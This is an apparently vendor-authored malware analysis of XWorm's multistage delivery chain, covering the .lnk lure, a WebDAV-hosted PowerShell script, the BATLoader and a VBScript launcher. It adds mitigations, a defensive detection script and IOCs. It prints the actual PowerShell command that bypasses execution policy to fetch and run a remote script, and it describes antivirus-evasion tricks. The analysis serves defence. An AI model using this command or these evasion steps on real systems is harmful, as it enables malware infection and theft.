Sneaky XWorm Uses MultiStaged Attack

Threat Actors Leveraging WebDAV Servers for Covert Operations


Threat Actors (TAs) frequently utilize multistage attacks to increase the likelihood of successfully delivering malicious payload by evading detection from antivirus products and creating a complex and intricate attack structure that poses challenges for analysis.

TAs commonly employ LOLBins (Living Off the Land Binaries) in multistage attacks. LOLBins are legitimate system binaries that TAs misuse to execute malicious actions without arousing suspicion. PowerShell.exe, Wscript.exe, wmic.exe, and regsvr32.exe are among the LOLBins most commonly used by TAs on Windows operating systems.

Cyble Research and Intelligence Labs (CRIL) analyzed a novel method of spreading the XWorm malware, which involves a multistage attack to deliver its payload using LOLBins. This sample was first brought to attention by, who tweeted about its discovery.


The initial phase of the attack originates from a .lnk file named “Invoice_7729839_PDF.lnk.” Given the filename, it is suspected that the .lnk file may have been distributed to users through spam emails. Upon opening the .lnk file, it executes malicious PowerShell content hosted on a WebDAV server provided by “TheDriveHQ,” a cloud-based file storage service.

This remotely hosted PowerShell code is responsible for downloading a .zip file containing a loader. The loader is designed to inject the XWorm code into a running process, facilitating the further spread of the malware.

The figure below shows the worm’s new infection chain.

Figure 1 – XWorm Infection chain


Technical analysis

Upon executing the .lnk file, it triggers the launch of a PowerShell process with the “ExecutionPolicy Bypass” option. The process attempts to access a remote PowerShell script named “sh.ps1” from a web server (\dhqid3b4b9u6ecv6jcxva0f[.]webdav[.]drivehq[.]com) using the WebDAV protocol.


C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass \\dhqid3b4b9u6ecv6jcxva0f[.]webdav.drivehq[.]com@SSL\DavWWWRoot\sh[.]ps1

Upon successful access, the PowerShell process executes the remote script “sh.ps1.” This remote script, in turn, downloads a zip file containing a batch script named “sh.bat” to the victim’s machine. The “sh.bat” batch script is executed on the victim’s machine after the download.

The newly launched batch script is the primary loader that delivers the final payload onto the system. This loader uses a distinctive method to deliver the malicious payload. We have recently seen multiple malware families delivered using this BATLoader technique and have analyzed them.

Unlike the previous delivery technique used by the XWorm malware, which depended on .pdfs, documents, and executables, this attack employed a multi-file approach, incorporating .ps1, .vbs, and .bat files.



The figure below shows the content of the BAT file downloaded from the web server.

Figure 2 – Downloaded BAT File content


When the BAT file is executed, it copies the legitimate “PowerShell.exe” from the “System32” directory into the working directory from which the BAT file was run. To evade detection, the copy is given a name other than PowerShell.exe, with a “.scr” extension.

Subsequently, the renamed copy of PowerShell.exe executes the obfuscated PowerShell code embedded within the BAT file, as shown in the figure below.

Figure 3 – Renamed PowerShell launched with the malicious content


Furthermore, the BAT file drops two additional files in the %AppData% folder “C:\Users\[User Profile]\AppData\Roaming”. One of these files is a self-copy of the original BAT file with a randomly generated name, while the other is a VBScript.

The image below shows the dropped files in the %Appdata% folder.

Figure 4 – Dropping files in %Appdata%


Once the files are dropped in the specified location, the BAT file executes the VBscript. The VBscript has minimal functionality and primarily serves to run the self-copied BAT file from the same location. The contents of the .vbs file are as follows:

CreateObject("Shell.Application").ShellExecute """C:\Users\[user profile]\AppData\Roaming\hDbJVbiqOn.cmd""", "", "", "open", 2

Unlike previous BATLoader variants that executed the BAT file directly, this particular case employs VBScript to run the BAT file, effectively evading detection by Antivirus products.
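The three process-level behaviours described above (PowerShell started against a WebDAV UNC path, a renamed copy of PowerShell.exe, and a script host launching a batch file from the roaming profile) can each be matched in process-creation telemetry. The following is an added example, not code from Cyble or from the sample: it assumes records carrying Sysmon Event ID 1 field names, and the sample events, host names, file names and rule names are all constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records using Sysmon Event ID 1 field names.
# Hosts, users and file names are invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass \\files.example.test@SSL\DavWWWRoot\sh.ps1"},
    {"Image": r"C:\Users\alice\Downloads\invoice.scr",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "invoice.scr <obfuscated script omitted>"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'cmd.exe /c ""C:\Users\alice\AppData\Roaming\example.cmd""'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# UNC path routed through the WebDAV redirector (\\host[@SSL]\DavWWWRoot\...).
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\\", re.I)
# Batch file stored directly under the user's roaming profile.
ROAMING_BATCH = re.compile(r'\\AppData\\Roaming\\[^\\"]+\.(?:cmd|bat)\b', re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(ev):
    """Return the names of the (hypothetical) rules one event matches."""
    hits = []
    # OriginalFileName comes from the PE version resource, so it survives a rename.
    is_ps = ev.get("OriginalFileName", "").lower() == "powershell.exe"
    if is_ps and WEBDAV_UNC.search(ev["CommandLine"]):
        hits.append("powershell_webdav_unc")
    if is_ps and basename(ev["Image"]) != "powershell.exe":
        hits.append("renamed_powershell")
    if (basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and ROAMING_BATCH.search(ev["CommandLine"])):
        hits.append("script_host_runs_roaming_batch")
    return hits

def scan(events):
    return [classify(e) for e in events]
```

The last sample event is an ordinary local PowerShell invocation and matches none of the rules.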

The figure below shows the infection chain of new and old variants of BATLoader spreading XWorm.

Figure 5 – New and Old variants of BATLoader infection chain


As previously mentioned, the BAT file contains obfuscated content. However, after deobfuscating the code, it becomes clear that the content employs a familiar BATLoader technique observed in other malware families. This technique involves using AES decryption operations and loading assemblies using the PowerShell script.

The deobfuscated content is shown in the figure below.

Figure 6 – Deobfuscated content


Final Payload – XWorm


XWorm is classified as commodity malware, designed to be readily accessible to TAs, even those with limited technical expertise, who can purchase and utilize it for various cybercrimes. This versatile malware has a wide array of capabilities, including stealing sensitive data, executing Distributed Denial of Service (DDoS) attacks, acting as a clipper to alter cryptocurrency addresses, deploying ransomware, and downloading additional malware into the compromised system.

Cyble has conducted a comprehensive analysis of XWorm and previously shared insights on this malware in our blog. XWorm Version 4.2 is presently being offered by the TAs for $400 for a lifetime subscription, as shown below.

Figure 7 – XWorm Subscription


According to the TA’s claims, XWorm Version 4.2 has the following features:

Figure 8 – XWorm features




The analysis of the XWorm malware and its weaponization techniques reveals a concerning trend in cyberattacks. TAs are increasingly turning to LOLBins and legitimate software as vehicles to deliver their malicious payloads onto the victim’s system. The multistage attack chain employed by XWorm, coupled with its utilization of WebDAV servers for code execution and downloads, emphasizes the importance of robust cybersecurity strategies.

Gaining a thorough understanding of this distinctive attack chain becomes paramount in devising effective mitigation measures to safeguard against XWorm and other similar malware in the future.

Cyble Research and Intelligence Labs continues to monitor the activity of XWorm and other malware and will provide timely updates to our readers.



  • The initial infection may happen via spam emails or phishing websites, so enterprises should use security products to detect phishing emails and websites.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.

MITRE ATT&CK® Techniques


| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1566 | Spearphishing Attachment |
| Execution | T1204 | User Execution |
| Execution | | Command and Scripting Interpreter |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Command and Control | T1071 | Application Layer Protocol |

Indicators of Compromise (IOCs)


| Indicators | Indicator Type | Description |
|---|---|---|
| a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5 | SHA256 | Lnk file |
| 9587ef7ba7dfe745e4c98f724110382b7b53f5f7781d1d3fcfc910abacb3fbb8 | SHA256 | BATLoader |
| b64ed641eafbae33d195864576629ae9e922948b59d9f7e6f4fcaafebcc1b1ca | SHA256 | XWorm malware |
